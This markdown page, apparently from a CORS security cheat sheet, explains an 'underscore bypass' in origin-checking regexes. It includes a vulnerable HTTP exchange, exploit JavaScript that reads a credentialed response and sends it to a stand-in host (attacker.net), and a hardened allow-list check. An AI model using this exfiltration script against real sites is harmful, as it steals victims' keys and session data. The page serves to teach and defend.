UNDERSCORE_BYPASS.md

File metadata and controls

39 lines (30 loc) · 972 Bytes

Underscore Bypass

Description

The regular expression used for origin verification contains an underscore (_) character, so an origin whose hostname has an underscore where a dot belongs passes the check.

www.example.com trusts www.sub_example.com, which could be an attacker's domain.

Severity: High

Exploit

If the target is sub.example.com, make requests from sub_example.com.

Example

Vulnerable Implementation

```http
GET /endpoint HTTP/1.1
Host: api.example.com
Origin: https://sub_example.com

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://sub_example.com
Access-Control-Allow-Credentials: true

{"[private API key]"}
```

Exploit
This exploit requires that the following JavaScript is hosted at sub_example.com.

```javascript
// Credentialed cross-origin request to the vulnerable endpoint; the browser
// sends the victim's cookies because the response allows credentials.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('GET', 'https://api.example.com/endpoint', true);
req.withCredentials = true;
req.send();

// Read the response (allowed because ACAO echoes sub_example.com) and exfiltrate it.
function reqListener() {
    location = '//attacker.net/log?key=' + this.responseText;
}
```
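The flawed check from the Description beside a hardened one, as an added example that is not part of the original page. The regex shape (an unescaped dot that also accepts `_`), the function names and the allow-list contents are assumptions; the check runs over constructed sample origins, including the underscore variant above.

```javascript
// Added example (not from the original page). The regex shape, names and
// allow-list are assumptions used to illustrate the underscore bypass.

// Weak: the dot between "sub" and "example" is unescaped, so the pattern
// accepts any single character there, including "_" (sub_example.com).
const WEAK_ORIGIN_RE = /^https:\/\/sub.example\.com$/;

function isAllowedOriginWeak(origin) {
  return WEAK_ORIGIN_RE.test(origin);
}

// Hardened: parse the Origin header and compare scheme and hostname exactly
// against an explicit allow-list; no regex, no reflection of unknown origins.
const ALLOWED_HOSTS = new Set(['sub.example.com', 'www.example.com']);

function isAllowedOriginStrict(origin) {
  let url;
  try {
    url = new URL(origin);
  } catch (e) {
    return false; // malformed or missing Origin: treat as untrusted
  }
  return url.protocol === 'https:' && ALLOWED_HOSTS.has(url.hostname);
}

// CORS response headers for a credentialed endpoint. Untrusted origins get
// no Access-Control-Allow-Origin at all, so the browser blocks the read.
function corsHeaders(origin, isAllowed) {
  if (!isAllowed(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Constructed sample origins, including the underscore variant from the page.
const SAMPLE_ORIGINS = [
  'https://sub.example.com',   // legitimate
  'https://sub_example.com',   // underscore bypass
  'https://subXexample.com',   // any character passes the weak regex
  'http://sub.example.com',    // wrong scheme
];

// Run both checks over the samples: the weak regex admits three of the four,
// the strict allow-list admits only the legitimate origin.
function compareChecks() {
  return SAMPLE_ORIGINS.map((o) => ({
    origin: o,
    weak: isAllowedOriginWeak(o),
    strict: isAllowedOriginStrict(o),
  }));
}
```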